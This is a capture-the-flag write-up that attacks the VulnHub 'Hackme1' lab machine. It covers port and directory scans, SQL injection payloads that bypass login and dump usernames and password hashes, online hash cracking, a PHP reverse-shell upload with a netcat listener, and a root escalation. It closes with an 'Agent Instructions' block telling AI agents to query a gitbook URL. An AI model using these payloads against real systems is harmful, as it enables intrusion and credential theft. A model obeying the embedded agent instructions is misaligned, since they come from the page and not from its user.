# Hackme1 ## Enumeration ### nmap ``` nmap -sC -sV -oA nmap/hackme1 192.168.1.109 ``` ``` Starting Nmap 7.80 ( https://nmap.org ) at 2020-05-23 19:15 EDT Nmap scan report for 192.168.1.109 Host is up (0.00016s latency). Not shown: 998 closed ports PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 7.7p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 2048 6b:a8:24:d6:09:2f:c9:9a:8e:ab:bc:6e:7d:4e:b9:ad (RSA) | 256 ab:e8:4f:53:38:06:2c:6a:f3:92:e3:97:4a:0e:3e:d1 (ECDSA) |_ 256 32:76:90:b8:7d:fc:a4:32:63:10:cd:67:61:49:d6:c4 (ED25519) 80/tcp open http Apache httpd 2.4.34 ((Ubuntu)) |_http-server-header: Apache/2.4.34 (Ubuntu) |_http-title: Site doesn't have a title (text/html; charset=UTF-8). MAC Address: 00:0C:29:BA:01:E1 (VMware) Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 7.83 seconds ``` ### Dirb ``` dirb http://192.168.1.109/ ``` ``` ----------------- DIRB v2.22 By The Dark Raver ----------------- START_TIME: Sat May 23 19:18:32 2020 URL_BASE: http://192.168.1.109/ WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt ----------------- GENERATED WORDS: 4612 ---- Scanning URL: http://192.168.1.109/ ---- + http://192.168.1.109/index.php (CODE:200|SIZE:100) + http://192.168.1.109/server-status (CODE:403|SIZE:301) ==> DIRECTORY: http://192.168.1.109/uploads/ ---- Entering directory: http://192.168.1.109/uploads/ ---- (!) WARNING: Directory IS LISTABLE. No need to scan it. (Use mode '-w' if you want to scan it anyway) ----------------- END_TIME: Sat May 23 19:18:38 2020 DOWNLOADED: 4612 - FOUND: 2 ``` Let's put the IP to the web browser ![](/files/-M82p0AnAowCXtED5_Kg) Got a login form Then I click sign up now ![](/files/-M82rN8uruxafeOHpjVa) After making an account and log in ![](/files/-M82rUVbyV76nXJrC4pM) ## Exploitation ### SQL injection I tried few tries of SQL injection and successfully got 1 injection using this command ``` admin' or '1'='1'# ``` Then I open up Burp and intercept the welcome.php page and send it to repeater. Then I tried using UNION SELECT and test how many tables are available ``` Anonymous' UNION SELECT 1,2,3# ``` ![](/files/-M82s3TEOA8MrlktP5q2) The query make a response to us and it has 3 databases Then I use this query to extract all the database name ``` Anonymous' UNION SELECT GROUP_CONCAT(SCHEMA_NAME),2,3 FROM information_schema.schemata# ``` ![](/files/-M82sUg6Z95fHvVuuVBm) We got few here to see what inside. After extracting every databases, I found out that database that have interesting tables is `webapphacking by usinig this query` ``` Anonymous' UNION SELECT GROUP_CONCAT(TABLE_NAME),2,3 FROM information_schema.tables WHERE table_schema = "webapphacking"# ``` ![](/files/-M82t9aLhHpYSls5uOy9) 2 table has been found which is `books` and `users` After that, I extract both tables together using this query ``` Anonymous' UNION SELECT GROUP_CONCAT(TABLE_NAME, ':', COLUMN_NAME),2,3 FROM information_schema.columns WHERE table_schema = "webapphacking"# ``` ![](/files/-M82tk7wCmDyEdP8at-e) Got a lot of things, let's copy it and put it inside a file Then we can use `sed` to replace the comma to newline which the command looks like this ``` cat tables | sed 's/,/\n/g' ``` ![](/files/-M82uHjZSBQt4hApLRtH) Then we can extract each of the columns name, found out the most interesting one is `user` and `password` ``` Anonymous' UNION SELECT GROUP_CONCAT(user, ':',pasword),2,3 FROM webapphacking.users# ``` ![](/files/-M82wjUax0L0mfTdsaNO) Then we got a very long result from the query, copy it to a file and use `sed` command to separate it properly ### John ![](/files/-M82xP0YsdG0tAW1DD8S) As we can see it is all md5 hash so we can put it to this [website](https://crackstation.net/) to crack cause john is cracking way too slow! ![](/files/-M830rZhRTqAv7Xvcoqn) Then we can log in with the `superadmin` account ![](/files/-M831cab-tCK-JV7OKQM) Got a website that leads us to upload a file ### Reverse Shell We can go to this [website](http://pentestmonkey.net/tools/web-shells/php-reverse-shell) and grab the php reverse shell file Then, we need to change the IP and the port inside the file ![](/files/-M832AZeX-dnzyymD6vU) After that, upload to the server ![](/files/-M832FRk7Bd72NN2uFPj) Then, we go to the `/upload` directory that we discovered using `dirb` just now First, we need to set up a listener at our machine Our machine ``` nc -nlvp 4444 ``` ![](/files/-M832pcwv8MLKq2IBCmf) As we can see here we got a file, click the reverseShell file ![](/files/-M832xTdISuQbZdjEPti) ## Privilege Escalation Go to the /home/legacy directory and we can see a file called touchmenot run the file and you will get root ! ![](/files/-M834qnuzhWba_czCmOW) Congratulation ! --- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://choochisiang.gitbook.io/report/vulnhub/hackme1.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.